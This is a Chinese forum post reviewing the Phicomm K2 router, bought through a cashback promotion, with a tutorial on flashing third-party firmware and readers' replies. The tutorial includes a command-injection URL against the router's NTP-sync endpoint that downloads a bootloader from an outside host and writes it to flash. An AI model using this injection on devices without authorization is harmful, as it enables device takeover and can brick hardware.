[无线路由] 【618败家晒】忍不住上车了!反赚25元,白拿京东斐讯K2路由器,另附刷机教程!

开心
    【买就返399元】斐讯K2 1200M智能双频无线路由器 WIFI穿墙 PSG1218
    【京东自营】6月27日下单再赚20元京东E卡!再返399元!再也不做剁手党! 京东白条30天免息 网络换新 买11AC双频 体验高速wifi快感!
    京东价:¥399.00

斐讯路由器,这几个月也是小有名气,可能主要也是因为他搞的这个“购买30天返款”活动。
    我也是几个月前就看到很多人在撸这款路由器了,但是一直也没买。
    第一呢,因为家里路由器已经有好几个了,其中有3个都是在本友会、试客参加活动得的(小伙伴们,用心参加IT168的各项活动吧,奖品多多),所以总觉得买了这个也没啥用。
    第二呢,这个是一个月后返钱,之前也担心万一跑路了怎么办。
    这两天网上看到小伙伴们又嚷嚷着准备买这款路由器,仔细一看原来今天(6月27日)购买的话,收货7天后,返20元京东E卡。于是没忍住,也上车了。

▲路由器399元,下单用了一张100元的京东E卡,然后打白条又减了5元,收货7天后再反20京东E卡。
    这样30天后顺利返钱后,等于除了白拿一台路由器之外,还反赚了25元,而且之前100元的京东卡也等于变现了。

▲京东的速度确实快,上午下单,下午就送到了。
    这路由器盒子还真不小,反正比一般的路由器盒子都大。

▲打开盒子以后,斐讯K2这路由器也不小。四四方方的,样子还说得过去。

▲大盒子里东西不多:路由器主机、电源适配器、说明书、返款操作指导卡片。

▲电源适配器做工也还不错,这东西基本也都是通用的。

▲之前用的路由器是2根天线的,这个斐讯K2四根天线,支起来还是很有气势的。

▲斐讯K2一共有四个lan口,但是没有USB口比较遗憾。

▲背面有大面积的散热孔,四个防滑脚垫。返款用的K码也在机身这一面的下方,刮开就能看到了。

▲连接好路由器以后,浏览器输入管理地址:192.168.2.1 进入路由器管理界面

▲点击“马上体验”之后,选择上网方式,然后填写账号、密码,即可完成路由器的初步设置。

▲斐讯本身的固件管理功能也是挺丰富的,而且还可以手机下载APP进行管理。
    但是基于众多网友的反馈和京东产品下方的购物评价,斐讯自身的固件可能存在安全性的问题,而且稳定性好像也不是很好。
    所以我准备给它刷一个更好用的固件。

固件下载地址:http://pan.baidu.com/s/1o7SfO6I

注:刷固件前,要设置好路由器,可以正常联网之后才可以。

复制下面的代码,然后粘贴到浏览器地址栏,敲回车。

http://192.168.2.1/goform/gra_NTPSyncWithLocal?text_year="2016|`if wget -O /tmp/breed.bin http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin;then mtd_write write /tmp/breed.bin Bootloader;echo breed ok! >/etc_ro/web/index.asp;fi`"

几秒后,浏览器会跳转到路由器登陆界面,填写管理密码(默认:admin)后点击登陆。
    此时如果页面左上角显示:breed ok!
    则证明路由器刷breed成功了,重启后即可随意刷机。

▲进入路由器Breed控制平台方法:拔掉路由器的电源,然后按住reset键插上电源(不松开Reset),(接通电源三四秒后松开Reset)地址栏输入192.168.1.1,就进入了breed界面。
    在这里我们就可以给路由器刷固件了。

▲选择第二项:固件更新,进入如图所示界面。
    然后点击“固件”,再点击右侧的“选择文件”

▲选择刚才下载好的固件,点击打开即可。

▲选择好固件之后,点击“上传”,然后点击“更新”,接下来等着进度条百分百就好了,路由器会自动重启。

▲我这里新刷的是好评率比较高的华硕固件,浏览器输入:192.168.123.1 即可进入新的路由器管理界面。
    上网设置和其他路由器都是一样的。

▲上面的管理地址要是感觉不好记的话,也可以自行设置修改成其他的管理地址。

▲我之所以选择这个华硕固件,主要是因为这个固件的功能性(如图所示:科学上网、屏蔽广告等)不错,稳定性很棒,可玩性也很高。
    当然除此之外,潘多拉固件的可玩性和功能性也很不错。愿意折腾的,也可以自行搜索相关固件,刷的方法和前面一样。

K码返钱我也参照路由器附带小卡片上的指示弄好了,就等着30天后提现返钱了,希望一切顺利吧。

注:路由器刷固件有风险,参加这种返钱活动也有风险。

有什么问题,小伙伴们可以在下方回帖留言。
    开心
    商家到底图啥呢
    开心
    机智的蘑菇 发表于 2016-6-28 09:23
    商家到底图啥呢

可能是商家自融资金的一种手段

露珠厉害,昨天考虑了半天,最终还是没下手!!!!万一厂家不退款,万一厂家跑路了,那可怎么办
    开心
    jklxc 发表于 2016-6-28 09:58
    露珠厉害,昨天考虑了半天,最终还是没下手!!!!万一厂家不退款,万一厂家跑路了,那可怎么办

该出手时就出手啊,风风火火闯九州啊
    开心
    楼主很会淘货
    大哭
    斐讯的路由质量不咋的,花了二十几买了一个,刷了腾达的固件,经常掉线
    开心
    zhulaomao 发表于 2016-7-2 10:54
    斐讯的路由质量不咋的,花了二十几买了一个,刷了腾达的固件,经常掉线

刷华硕固件还不错
    用了几天了,挺稳定的
    还能屏蔽视频网站广告
    当然了,这路由器主要是做活动
    要不然肯定不值399的
    擦汗
    机智的蘑菇 发表于 2016-6-28 09:23
    商家到底图啥呢

为了推广其 练笔(为避免广告,谐音)金融。
    收益确实高,但我没投入,,我就是白拿了K1、K2而已
    擦汗
    jklxc 发表于 2016-6-28 09:58

目前来看,还是可以下手的。已经成功入手K1、K2 。并且返现已到手。
    擦汗
    zhulaomao 发表于 2016-7-2 10:54

做工也一般。
    开心
    万一厂家不退款
    开心
    syau008 发表于 2016-7-2 22:58
    为了推广其 练笔(为避免广告,谐音)金融。
    收益确实高,但我没投入,,我就是白拿了K1、K2而已

收益太吓人了,我也没敢买
    就是撸个路由器玩玩
    萌哒
    顶。

第4台在路上了。这货比newifi差点,不过只要能返钱就不错。经过测试刷了老毛子的固件比我的4300强不少。
    开心
    temptempit 发表于 2016-7-11 19:27
    第4台在路上了。这货比newifi差点,不过只要能返钱就不错。经过测试刷了老毛子的固件比我的4300强不少。

哈哈,我只弄了2台。
    还有2周下车。
    刷个新固件,一般家用基本也够了。

tornado106 发表于 2016-7-11 19:54
    哈哈,我只弄了2台。
    还有2周下车。
    刷个新固件,一般家用基本也够了。

自己家,老家,朋友家,亲戚家。好东西要分享,哈哈。   不过要是没下车就惨了。

楼主 进不去啊 显示404
    开心
    15845232365 发表于 2016-11-2 16:20
    楼主 进不去啊 显示404

哪个进不去?
    无聊
    mark 一下 我已上车
    diy电脑